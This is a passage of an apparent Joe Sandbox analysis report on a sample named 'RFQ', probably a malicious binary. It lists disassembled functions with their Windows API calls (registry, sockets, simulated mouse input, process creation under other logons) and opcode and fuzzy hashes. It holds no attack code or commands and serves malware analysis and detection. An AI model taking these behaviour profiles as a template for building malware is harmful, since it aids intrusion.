                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0079318B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3451389628-0
                                                                                                                                                    • Opcode ID: 286f1b772b3179c26907aacb40f19ad0871152fea77b17622b0f5fd9e8e18bd1
                                                                                                                                                    • Instruction ID: c43fa849d3c5e977c795c56cd7a8afd0bf2527589710eb806e7da24274f080c9
                                                                                                                                                    • Opcode Fuzzy Hash: 286f1b772b3179c26907aacb40f19ad0871152fea77b17622b0f5fd9e8e18bd1
                                                                                                                                                    • Instruction Fuzzy Hash: 78515931104304EFDB14EF64D889E6ABBE9FF88300F04891DF555972A2DB39EA05CB52
                                                                                                                                                    Function 007984DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenu.USER32(?), ref: 00798540
                                                                                                                                                    • GetMenuItemCount.USER32(00000000), ref: 00798577
                                                                                                                                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0079859F
                                                                                                                                                    • GetMenuItemID.USER32(?,?), ref: 0079860E
                                                                                                                                                    • GetSubMenu.USER32(?,?), ref: 0079861C
                                                                                                                                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 0079866D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$CountMessagePostString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 650687236-0
                                                                                                                                                    • Opcode ID: 2f3bc20b26221a3a916e93385ba5473c37f2c4cce9e40f8f463934ff0c5d3910
                                                                                                                                                    • Instruction ID: 12ccb5f6148b83d826d4a886bace5c1fae3965e75cdb1dc378eabd9f5ef65af0
                                                                                                                                                    • Opcode Fuzzy Hash: 2f3bc20b26221a3a916e93385ba5473c37f2c4cce9e40f8f463934ff0c5d3910
                                                                                                                                                    • Instruction Fuzzy Hash: 5751CE31A00214EFCF11EF68C845AAEB7F4EF09310F158069F905BB352DB78AE418B95
                                                                                                                                                    Function 00774AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 00774B10
                                                                                                                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00774B5B
                                                                                                                                                    • IsMenu.USER32(00000000), ref: 00774B7B
                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00774BAF
                                                                                                                                                    • GetMenuItemCount.USER32(000000FF), ref: 00774C0D
                                                                                                                                                    • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00774C3E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3311875123-0
                                                                                                                                                    • Opcode ID: 56dc1a141cd91df4be4a01b617f9c1ff2891f23aff9875ae6297ad55328adb8b
                                                                                                                                                    • Instruction ID: ba1c8a46083c9e8c8ceac24aebde711dbc119b4e0cdff8d343c57b708a41dafc
                                                                                                                                                    • Opcode Fuzzy Hash: 56dc1a141cd91df4be4a01b617f9c1ff2891f23aff9875ae6297ad55328adb8b
                                                                                                                                                    • Instruction Fuzzy Hash: AB51C1B0601209EFDF25CF64C888BADBBF4AF45398F24C159E4199B2A1E3789D44CB61
                                                                                                                                                    Function 00788DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,007CDC00), ref: 00788E7C
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00788E89
                                                                                                                                                    • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00788EAD
                                                                                                                                                    • #16.WSOCK32(?,?,00000000,00000000), ref: 00788EC5
                                                                                                                                                    • _strlen.LIBCMT ref: 00788EF7
                                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00788F6A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$_strlenselect
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2217125717-0
                                                                                                                                                    • Opcode ID: 42bf93e8b84e47233f7da2793edfefb382071d61b1c2f78349277eca432c2be7
                                                                                                                                                    • Instruction ID: 1ad0c3fdc224e10a99edb236987d9a6fff3ffbf43c89689bc1eb0bf7b5db2aa9
                                                                                                                                                    • Opcode Fuzzy Hash: 42bf93e8b84e47233f7da2793edfefb382071d61b1c2f78349277eca432c2be7
                                                                                                                                                    • Instruction Fuzzy Hash: 9541C271500104EFDB54EB64CD89EEEB7B9AF58310F108259F51AD7292EF38AE00CB21
                                                                                                                                                    Function 0074ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074B34E: GetWindowLongW.USER32(?,000000EB), ref: 0074B35F
                                                                                                                                                    • BeginPaint.USER32(?,?,?), ref: 0074AC2A
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 0074AC8E
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 0074ACAB
                                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0074ACBC
                                                                                                                                                    • EndPaint.USER32(?,?,?,?,?), ref: 0074AD06
                                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 007AE673
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2592858361-0
                                                                                                                                                    • Opcode ID: a2aef65ebf3ec68d884e9bb03dbe18ff65ca4ed0f542c465e72a52c4d0733e28
                                                                                                                                                    • Instruction ID: 6a128781deb33904458119cd68efa7bafd1522e23e70479e76d586cca951a300
                                                                                                                                                    • Opcode Fuzzy Hash: a2aef65ebf3ec68d884e9bb03dbe18ff65ca4ed0f542c465e72a52c4d0733e28
                                                                                                                                                    • Instruction Fuzzy Hash: 5441DE70100301EFC720DF24CC88FBA7BA8EB59320F044769F9A4872A1D739AC45DB66
                                                                                                                                                    Function 0079E397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(007F1628,00000000,007F1628,00000000,00000000,007F1628,?,007ADC5D,00000000,?,00000000,00000000,00000000,?,007ADAD1,00000004), ref: 0079E40B
                                                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0079E42F
                                                                                                                                                    • ShowWindow.USER32(007F1628,00000000), ref: 0079E48F
                                                                                                                                                    • ShowWindow.USER32(00000000,00000004), ref: 0079E4A1
                                                                                                                                                    • EnableWindow.USER32(00000000,00000001), ref: 0079E4C5
                                                                                                                                                    • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0079E4E8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 642888154-0
                                                                                                                                                    • Opcode ID: 134851a1003fbcc06b1c12ef49c6e80a5ceb2ce8d385957aa9520b9f4261759c
                                                                                                                                                    • Instruction ID: 3dc7900ff33759885a528e6f69bc4508e5d703a4a17580cd005447392ca02222
                                                                                                                                                    • Opcode Fuzzy Hash: 134851a1003fbcc06b1c12ef49c6e80a5ceb2ce8d385957aa9520b9f4261759c
                                                                                                                                                    • Instruction Fuzzy Hash: 4F414D34601181EFDF22CF28D599F947BE1BB09314F1881A9FA588F2B2C779E841CB51
                                                                                                                                                    Function 007798BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 007798D1
                                                                                                                                                      • Part of subcall function 0074F4EA: std::exception::exception.LIBCMT ref: 0074F51E
                                                                                                                                                      • Part of subcall function 0074F4EA: __CxxThrowException@8.LIBCMT ref: 0074F533
                                                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00779908
                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 00779924
                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 0077999E
                                                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007799B3
                                                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 007799D2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2537439066-0
                                                                                                                                                    • Opcode ID: af90f8d86182549380bd2a0f5c0d5d0ea3ef55ad2c455a8ad735891600e315b8
                                                                                                                                                    • Instruction ID: f367fbe064cb02db113042db40ddd37b26cf23a5e820850bb97827def38933c2
                                                                                                                                                    • Opcode Fuzzy Hash: af90f8d86182549380bd2a0f5c0d5d0ea3ef55ad2c455a8ad735891600e315b8
                                                                                                                                                    • Instruction Fuzzy Hash: 6F315231900105EBDF109FA4DC89EAAB778FF85310B148179F904AB246D778DE10DB64
                                                                                                                                                    Function 00789B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32(?,?,?,?,?,?,007877F4,?,?,00000000,00000001), ref: 00789B53
                                                                                                                                                      • Part of subcall function 00786544: GetWindowRect.USER32(?,?), ref: 00786557
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00789B7D
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00789B84
                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00789BB6
                                                                                                                                                      • Part of subcall function 00777A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00777AD0
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00789BE2
                                                                                                                                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00789C44
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4137160315-0
                                                                                                                                                    • Opcode ID: d37dc9cc2b5c6ffad297d3bbb0600976ccd5cef874f52c1353fd72abb7a3dfad
                                                                                                                                                    • Instruction ID: 8c076321d2c218a7814f9f588868ca214a389e27731054a8e0c651946ef8f3e6
                                                                                                                                                    • Opcode Fuzzy Hash: d37dc9cc2b5c6ffad297d3bbb0600976ccd5cef874f52c1353fd72abb7a3dfad
                                                                                                                                                    • Instruction Fuzzy Hash: 9231C372144305ABD720DF14D849F9ABBE9FF84314F044A29F589D7181E635E914CB92
                                                                                                                                                    Function 0076AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0076AFAE
                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0076AFB5
                                                                                                                                                    • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0076AFC4
                                                                                                                                                    • CloseHandle.KERNEL32(00000004), ref: 0076AFCF
                                                                                                                                                    • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0076AFFE
                                                                                                                                                    • DestroyEnvironmentBlock.USERENV(00000000), ref: 0076B012
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1413079979-0
                                                                                                                                                    • Opcode ID: 0f5b26b238901562c019aa2f42813b5ed9a71645da2f6f4144f91644942e36a1
                                                                                                                                                    • Instruction ID: 6fd6c0834a93b78f2977dba969da6a7baa391695982e2af476c0618d8991e276
                                                                                                                                                    • Opcode Fuzzy Hash: 0f5b26b238901562c019aa2f42813b5ed9a71645da2f6f4144f91644942e36a1
                                                                                                                                                    • Instruction Fuzzy Hash: 9B214C72100209BBDB129F94ED09FEE7BA9AB45304F048125FE02A2161D37ADD61EF62
                                                                                                                                                    Function 0079EBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0074AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0074AFE3
                                                                                                                                                      • Part of subcall function 0074AF83: SelectObject.GDI32(?,00000000), ref: 0074AFF2
                                                                                                                                                      • Part of subcall function 0074AF83: BeginPath.GDI32(?), ref: 0074B009
                                                                                                                                                      • Part of subcall function 0074AF83: SelectObject.GDI32(?,00000000), ref: 0074B033
                                                                                                                                                    • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0079EC20
                                                                                                                                                    • LineTo.GDI32(00000000,00000003,?), ref: 0079EC34
                                                                                                                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0079EC42
                                                                                                                                                    • LineTo.GDI32(00000000,00000000,?), ref: 0079EC52
                                                                                                                                                    • EndPath.GDI32(00000000), ref: 0079EC62
                                                                                                                                                    • StrokePath.GDI32(00000000), ref: 0079EC72
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 43455801-0
                                                                                                                                                    • Opcode ID: e1dd75baaf408eb046cb44641d0155b0e25d861908687bc1ea0a1e28edc103fa
                                                                                                                                                    • Instruction ID: 5c8d18cea9d4717b4df4665af61bf1e6b188a4ca17b15f3dfe56858471077cfc
                                                                                                                                                    • Opcode Fuzzy Hash: e1dd75baaf408eb046cb44641d0155b0e25d861908687bc1ea0a1e28edc103fa
                                                                                                                                                    • Instruction Fuzzy Hash: 5111057200014EBFEF129F94DC88FEA7F6DEB08350F048122BE089A160E7769D55DBA4
                                                                                                                                                    Function 0076E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDC.USER32(00000000), ref: 0076E1C0
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0076E1D1
                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0076E1D8
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0076E1E0
                                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0076E1F7
                                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,?), ref: 0076E209
                                                                                                                                                      • Part of subcall function 00769AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00769A05,00000000,00000000,?,00769DDB), ref: 0076A53A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131611471.00000000007DE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131649434.00000000007EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2131664822.00000000007F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_730000_RFQ.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 603618608-0
                                                                                                                                                    • Opcode ID: 1bc81f9587121d57b75e13e6107f064fca4668f13907c9b5af27f9706409a235
                                                                                                                                                    • Instruction ID: 36fb3802815a7301901f127a4a6df7741c39912e17bc11403d701cb4fbd65667
                                                                                                                                                    • Opcode Fuzzy Hash: 1bc81f9587121d57b75e13e6107f064fca4668f13907c9b5af27f9706409a235
                                                                                                                                                    • Instruction Fuzzy Hash: 2C0184B9A00218BFEB109BA58C45F5EBFB8EB48351F008166EE05A7290E6749C00CFA0
                                                                                                                                                    Function 00757B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • __init_pointers.LIBCMT ref: 00757B47
                                                                                                                                                      • Part of subcall function 0075123A: __initp_misc_winsig.LIBCMT ref: 0075125E
                                                                                                                                                      • Part of subcall function 0075123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00757F51
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00757F65
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00757F78
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00757F8B
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00757F9E
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00757FB1
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00757FC4
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00757FD7
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00757FEA
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00757FFD
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00758010
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00758023
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00758036
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00758049
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0075805C
                                                                                                                                                      • Part of subcall function 0075123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0075806F
                                                                                                                                                    • __mtinitlocks.LIBCMT ref: 00757B4C
                                                                                                                                                      • Part of subcall function 00757E23: InitializeCriticalSectionAndSpinCount.KERNEL32(007EAC68,00000FA0,?,?,00757B51,00755E77,007E6C70,00000014), ref: 00757E41
                                                                                                                                                    • __mtterm.LIBCMT ref: 00757B55
                                                                                                                                                      • Part of subcall function 00757BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00757B5A,00755E77,007E6C70,00000014), ref: 00757D3F
                                                                                                                                                      • Part of subcall function 00757BBD: _free.LIBCMT ref: 00757D46
                                                                                                                                                      • Part of subcall function 00757BBD: DeleteCriticalSection.KERNEL32(007EAC68,?,?,00757B5A,00755E77,007E6C70,00000014), ref: 00757D68
                                                                                                                                                    • __calloc_crt.LIBCMT ref: 00757B7A
                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00757BA3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2131564960.0000000000731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2131549855.0000000000730000.00000002.00000001.01000000.00000003.sdmpDownload File
